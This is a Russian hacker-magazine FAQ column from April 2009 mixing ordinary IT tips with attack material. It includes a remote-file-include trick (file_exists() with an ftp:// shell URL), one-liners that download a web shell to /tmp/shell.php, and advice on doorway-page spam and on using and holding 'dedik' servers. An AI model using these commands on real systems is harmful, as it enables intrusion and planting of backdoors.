Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР 124, АПРЕЛЬ 2009 г.

FAQ

Маг (icq 884888, http://wap-chat.ru)




Q: Существует куча php-классов для синонимизации (замены отдельных слов – синонимами) текста. А нет ли сервисов для онлайн-синонимизации?

A: Разнообразить свой дорвейный текст синонимами, что называется, не отходя от кассы, можно на ресурсах turnkeyhero.com/replacer_tester.php или spinnertool.com, которым пользуюсь лично я. А вот и пример онлайн-синонимизации. Передаем на вход сервису следующий текст:

You Can Quickly And Easily Rewrite Your Content And Drive More And More Ultra-Responsive Targeted Traffic To Your WebSite - Even If You Are A Newbie!

И получаем в ответ уникальный тест, созданный автоматическим копирайтером:

You Can Quickly And Colloquialism Writing Your Accumulation And Propulsion More And More Ultra-Responsive Targeted Assemblage To Your WebSite - Even If You Are A Newbie!

Неплохо для бесплатного сервиса, не правда ли?

Q: Как создать автонаполняемый блог?

A: Обычно для всяческих WordPress-блогов используются плагины, которые оперируют чужими Rss-лентами, преобразуя их в посты. Как быть, если ты создаешь блог на blogspot.com, wordpress.com и иже с ними? Все очень просто! Понадобится всего лишь такая фича блогохостингов, как постинг по e-mail, все те же стыренные Rss-ленты, а также сервис вроде www.rss2email.ru.

Итак, создавай новый блог, находи постинг по e-mail (на блогспоте ты получишь специальный e-mail, куда нужно будет присылать посты, а на вордпрессе – должен будешь ввести параметры доступа к любому своему ящику). Затем иди на www.rss2email.ru и добавляй новые ленты новостей со своим мылом. Через некоторое время с удивлением увидишь, что твой новоявленный блог, как по волшебству, растет и наполняется :).

Не надо забывать и о замечательном сервисе Yahoo Pipes (pipes.yahoo.com), позволяющем творить чудеса с различными RSS-потоками, а также просто информацией с произвольных веб-страниц, как угодно манипулируя данными. Причем, для этого не обязательно быть гуру в программинге и скрипто-строении: для кодинга используется графический подход, а именно – набор элементов, которые нужно разместить на рабочем поле, нужным образом связать и задать параметры. Подробнее читай в статье «Интернет на одной странице» (][#110).

Q: Подскажи, как определить, находится ли мой дедик за натом?

A: Очень просто! Заходи в «Start -> Run -> ipconfig» и смотри вывод команды. Дедик находится за NAT, если висит на одном из IP-диапазонов

10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255

Q: Как обойти проблему дисконнекта через n минут на моем дедике?

A: Допустим, твой логин на дедик Lopa. Тогда для тебя неприятность с вырубанием сессии лечится достаточно легко: My Computer -> Правая кнопка мыши -> Manage - Local users and groups -> Users -> Твой акк -> Правая кнопка мыши -> Properties -> Sessions. На этой вкладке везде ставь «Never». Также проверь в Run -> tscc.msc -> RDP следующие значения вкладок:

net accounts /forcelogoff:no
net accounts /maxpwage:unlimited

Q: Хочу создать свою блого-социальную сеть наподобие Хабра. Как проще это сделать?

A: Если не хочешь заморачиваться с написанием собственного движка, то могу посоветовать готовое бесплатное решение LiveStreet (http://livestreet.ru) от программера Максима Мжельского (aka ort).Основные возможности движка:

  • Использование UTF-8
  • Ведение персональных блогов
  • Возможность создания коллективных блогов
  • Система рейтингов блогов, топиков, комментариев, пользователей
  • Система голосования за блоги, топики, комментарии, пользователей
  • Возможность добавлять топики в избранное
  • Автоподстановка тегов
  • Коллективная внутренняя почта
  • Система контроля доступа (ACL) к разным возможностям сети (создание блога, голосование и т.п.)
  • Возможность создать закрытый сайт
  • Система инвайтов
  • Топики-ссылки
  • Топики-опросы
  • Администрирование своих блогов
  • Назначение модераторов блогов
  • Настройки оповещений на e-mail

А если ты решил создать тематическое сообщество и сделать его похожим, скажем, на VKontakte.ru, то можешь использовать часть движка. API для создания социалки, а также пример подобного ресурса бесплатно доступны на сайте userapi.com.

Q: Нашел удаленный инклуд в одном замечательном скрипте, но все дело портит функция file_exists(). Есть ли способы ее обойти?

A: Такие способы действительно есть! Раскопал их один из лидеров Античата .Slip (за что ему пожизненный респект!). Все дело в том, что, начиная с PHP 5.0.0, функция file_exists() может работать с упаковщиками урл. Не только с «ftp://», но так же и с «php://memory», «php://temp», «ssh2.sftp://».
Следующий скрипт выведет нам true!

<?php
echo file_exists("ftp://user:pwd@host/shell.txt");
?>

Подробнее об этом векторе атак на веб-приложения советую прочитать в топике .Slip'а: http://forum.antichat.ru/thread99589.html.

Q: Скачал с какого-то сайта дизайн в psd. Как бы теперь преобразовать его в css и html? Платить верстальщикам не хочу.

A: Попробуй бесплатный онлайн-сервис http://www.psd2cssonline.com.Для начала проверь в фотошопе, соответствует ли твой дизайн следующим требованиям сервиса:

  1. Дизайн не изобилует слоями.
  2. В дизайне используются только 8-битные RGB пикчи (16-битные и выше не поддерживаются).
  3. В дизайне отсутствуют невидимые слои.
  4. Psd-файл с дизайном весит не более 4 метров (8 - для платных юзеров).(Расширенную версию требований на английском языке смотри тут –www.psd2cssonline.com/node/9).

Все нормально и соответствует этим пунктам? Тогда смело загружай в форму «Upload your PSD» в шапке сайта свой многострадальный дизайн и наслаждайся результатом!

Q: Какие еще существуют никсовые качалки, полезные для нашего брата (кроме curl и wget)?

A: Вот простейший синтаксис всех распространенных качалок для никсов:

lynx: lynx -source "http://site.com/shell.txt" > /tmp/shell.php
links: links -source "http://site.com/shell.txt" > /tmp/shell.php
wget: wget -O /tmp/shell.php http://site.com/shell.txt
GET: GET http://site.com/perl.txt > /tmp/shell.php
fetch: fetch -o shell.php http://site.com/shell.txt
curl: curl --output shell.php http://site.com/shell.txt

Q: Я забыл свой админский пассворд на Винду! Что делать?

A: Используй тулзу Offline NT Password & Registry Editor (home.eunet.no/~pnordahl/ntpasswd).Из особенностей утилиты:

  • Сбрасывает пароль любого юзера, который имеет валидный аккаунт на твоей системе Windows NT/2k/XP/Vista
  • Можно не знать старый пароль для установки нового
  • Утилита работает offline, так что ты должен только ребутнуть свой компьютер с флопика, CD или какой-нибудь другой системы
  • Утилита сможет найти и разблокировать залоченные или отключенные аккаунты

Удачи!

Q: Хочу организовать свой сервис для восстановления md5-хешей, но, в то же время, не хочется заниматься генерацией радужных таблиц. Где бы скачать уже готовые таблицы?

A: В формате торрентов их можно скачать здесь: http://rainbowtables.shmoo.com.Сервис предлагает следующие rainbow tables:

  1. Большие буквы латинского алфавита;
  2. Большие буквы латинского алфавита + цифры;
  3. Большие буквы латинского алфавита + цифры + спецсимвол.

Также хочу порекомендовать софт для генерации данных таблиц (если ты не захочешь их качать) - RainbowCrack 1.2 (http://www.antsight.com/zsl/rainbowcrack).
А вот примерные размеры различных rainbow таблиц:

[ABCDEFGHIJKLMNOPQRSTUVWXYZ] - 610 MB (8353082582 записей);
[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789] - 3 GB (80603140212 записей);
[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ] -24 GB (915358891407 записей);
[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] - 64 GB (7555858447479 записей);
[abcdefghijklmnopqrstuvwxyz0123456789] - 36 GB (2901713047668 записей).

Q: Замучался уже обновлять свой ICQ-клиент из-за постоянных смен протокола AOL'ом. Как оставаться онлайн, несмотря на все их козни?

A: Если ты любишь пользоваться альтернативными асечными клиентами и ни в коем случае не хочешь ставить официальную ICQ 6.5 (что правильно), то могу посоветовать один из способов от админа Асечки .pin'а. Итак:

  1. Заходи на http://ru.toonel.net и скачивай Windows-версию клиента, не требующую Java (вес 2.0 MB);
  2. Устанавливай и запускай скачанную программу;
  3. Заходи на вкладку «Порты», удаляй все, кроме «127.0.0.1»;
  4. Выделяй «127.0.0.1» и проверь поле «локал.порт». Если цифра 8090 тебя устраивает – оставляй; нет - меняй на любой другой удобный тебе порт;
  5. Теперь заходи в свой асечный клиент, в раздел с настройками сети, устанавливай галку «Использовать прокси», тип «https», хост «localhost», порт 8090 (ну или тот, который ты выбрал раньше). Дальше – отмечай галку «Использовать DNS на прокси» и сохраняй новые настройки;
  6. Перелогинивайся и наслаждайся общением.

P.S. За все обновления протокола на мой любимый клиент &RQ ни единого раза не приходило злосчастное сообщение от UIN #1, – чего не скажешь о QIP и Miranda. Так что советую попробовать «крыску» (http://andrq.org).

Q: Не могу зайти на дедик! При входе пишет, что залогинено максимальное число пользователей! Как быть?

A: Тебе необходимо зайти на дед под админской учеткой с помощью специального ключа mstsc:

mstsc /admin (например, Windows XP SP3);
mstsc /console (например, Windows XP SP2 и другие более старые версии Винды).

Зайдя на дедик, вызывай Run -> taskmgr, заходи во вкладку с пользователями и разлогинивай любого не понравившегося юзера :).

P.S. Описанная тобой в сабже неприятность (максимальная одновременная работа только двух пользователей) обычно наблюдается у нелицензированной серверной Винды. Вывод: задумайся над лицензированием.

Q: Подскажите, возможно ли включить виртуализацию Hyper-V для Windows7.

A: Без проблем! Алгоритм такой:

  1. Сначала выкачиваемRemote Admin Tools с сайта Microsoft: technet.microsoft.com/en-us/library/cc780654.aspx.
  2. После установки заходим в «Control Panel -> Programs and Features», и отключаем «Turn Windows features on or off».
  3. Непосредственно включаем Hyper-V через «Remote Server Administration Tools -> Role Administration Tools -> Hyper-V Tools».

Q: Можно ли через PowerShell внести изменения в реестр так, чтобы не появились сообщения regedit'а? Есть необходимость выполнить некоторые действия удаленно через шелл и скрытно от пользователя.

A: Легко, – причем PowerShell предоставляет намного больше возможностей, нежели обычные .REG-файлы. В следующем примере мы добавим в раздел HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf ключ @="@SYS:DoesNotExist", отключив автозагрузку в системе (подробнее – читай в прошлом номере статью «Вакцина для флешки»). Перед добавлением мы проверим, чтобы такого ключа еще не было в системе.

function Disable-AutoRun
{
$item = Get-Item `
"REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping\AutoRun.inf" `
-ErrorAction SilentlyContinue
if (-not $item) {
$item = New-Item "REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping\AutoRun.inf"
}
Set-ItemProperty $item.PSPath "(default)" "@SYS:DoesNotExist"
}

Q: Хочу изучить работу одного хитрого девайса, который подключается к компьютеру по USB. Поэтому такой вопрос: как проще всего отснифать весь трафик и передаваемые данные по портам USB?

A: Если речь идет о Винде, то есть сразу несколько решений: USBTrace (www.sysnucleus.com), USB Monitor Professional (www.hhdsoftware.com), USBSpy 2.0 (www.everstrike.com/usb-monitor). Одна загвоздка - они платные. В случае с линуксом пользоваться шароварными или крякнутыми прогами не придется, потому что все необходимое есть уже в самой системе. В ядре доступен модуль usbmon, которыйсуществует испокон веков и как раз отвечает за снифинг USB-шины. Вывод этого драйвера можно просмотреть хоть через консоль, – если примонтировать debugfs и insmod'ить модуль usbmon:

mount -t debugfs none_debugs /sys/kernel/debug
modprobe usbmon

Для просмотра USB-трафика понадобится не более чем одна команда cat:

cat /sys/kernel/debug/usbmon/1u

Все данные идут в виде ASCII дампа, который очень легко пропарсить. Впрочем, есть и другой хинт. Известная библиотека Libpcap также поддерживает формат usbmon, а, значит, можно снимать USB-трафик построенным на ней снифером tcpdump. Более того - благодаря этому можно получать и просматривать данные в удобном графическом интерфейсе Wireshark (www.wireshark.org).

Q: Как объединить движки разных браузеров в одной программе, чтобы отследить как рендерятся страницы в каждом из них?

А: Сходу могут назвать пару вариантов.

  1. Использовать Firefox с дополнением IE Tab (ietab.mozdev.org) для браузера Internet Explorer и OperaView (operaview.mozdev.org) - соответственно, для Opera.
  2. Заинсталить программу от японских программеров Lunascape, которая объединяет в себе три движка для рендеринга веб-страниц – Trident (Internet Explorer), Gecko (Mozilla Firefox) и WebKit (Safari, Google Chrome). Это решение бесплатно можно скачать с www.lunascape.tv.

Q: Как определить разрядность .EXE или .DLL (т.е. тип процессора, для которого скомпилирован файл)?

A: Первый вариант - воспользоваться сборщиком из поставки Visual Studio:

link.exe /dump /headers <.exe>

У Microsoft существует небольшая утилита filever.exe (http://support.microsoft.com/kb/913111), которая выдает как раз то, что нужно, о любом бинарнике:

filever.exe <.exe>

Содержание
загрузка...
Журнал Хакер #151Журнал Хакер #150Журнал Хакер #149Журнал Хакер #148Журнал Хакер #147Журнал Хакер #146Журнал Хакер #145Журнал Хакер #144Журнал Хакер #143Журнал Хакер #142Журнал Хакер #141Журнал Хакер #140Журнал Хакер #139Журнал Хакер #138Журнал Хакер #137Журнал Хакер #136Журнал Хакер #135Журнал Хакер #134Журнал Хакер #133Журнал Хакер #132Журнал Хакер #131Журнал Хакер #130Журнал Хакер #129Журнал Хакер #128Журнал Хакер #127Журнал Хакер #126Журнал Хакер #125Журнал Хакер #124Журнал Хакер #123Журнал Хакер #122Журнал Хакер #121Журнал Хакер #120Журнал Хакер #119Журнал Хакер #118Журнал Хакер #117Журнал Хакер #116Журнал Хакер #115Журнал Хакер #114Журнал Хакер #113Журнал Хакер #112Журнал Хакер #111Журнал Хакер #110Журнал Хакер #109Журнал Хакер #108Журнал Хакер #107Журнал Хакер #106Журнал Хакер #105Журнал Хакер #104Журнал Хакер #103Журнал Хакер #102Журнал Хакер #101Журнал Хакер #100Журнал Хакер #099Журнал Хакер #098Журнал Хакер #097Журнал Хакер #096Журнал Хакер #095Журнал Хакер #094Журнал Хакер #093Журнал Хакер #092Журнал Хакер #091Журнал Хакер #090Журнал Хакер #089Журнал Хакер #088Журнал Хакер #087Журнал Хакер #086Журнал Хакер #085Журнал Хакер #084Журнал Хакер #083Журнал Хакер #082Журнал Хакер #081Журнал Хакер #080Журнал Хакер #079Журнал Хакер #078Журнал Хакер #077Журнал Хакер #076Журнал Хакер #075Журнал Хакер #074Журнал Хакер #073Журнал Хакер #072Журнал Хакер #071Журнал Хакер #070Журнал Хакер #069Журнал Хакер #068Журнал Хакер #067Журнал Хакер #066Журнал Хакер #065Журнал Хакер #064Журнал Хакер #063Журнал Хакер #062Журнал Хакер #061Журнал Хакер #060Журнал Хакер #059Журнал Хакер #058Журнал Хакер #057Журнал Хакер #056Журнал Хакер #055Журнал Хакер #054Журнал Хакер #053Журнал Хакер #052Журнал Хакер #051Журнал Хакер #050Журнал Хакер #049Журнал Хакер #048Журнал Хакер #047Журнал Хакер #046Журнал Хакер #045Журнал Хакер #044Журнал Хакер #043Журнал Хакер #042Журнал Хакер #041Журнал Хакер #040Журнал Хакер #039Журнал Хакер #038Журнал Хакер #037Журнал Хакер #036Журнал Хакер #035Журнал Хакер #034Журнал Хакер #033Журнал Хакер #032Журнал Хакер #031Журнал Хакер #030Журнал Хакер #029Журнал Хакер #028Журнал Хакер #027Журнал Хакер #026Журнал Хакер #025Журнал Хакер #024Журнал Хакер #023Журнал Хакер #022Журнал Хакер #021Журнал Хакер #020Журнал Хакер #019Журнал Хакер #018Журнал Хакер #017Журнал Хакер #016Журнал Хакер #015Журнал Хакер #014Журнал Хакер #013Журнал Хакер #012Журнал Хакер #011Журнал Хакер #010Журнал Хакер #009Журнал Хакер #008Журнал Хакер #007Журнал Хакер #006Журнал Хакер #005Журнал Хакер #004Журнал Хакер #003Журнал Хакер #002Журнал Хакер #001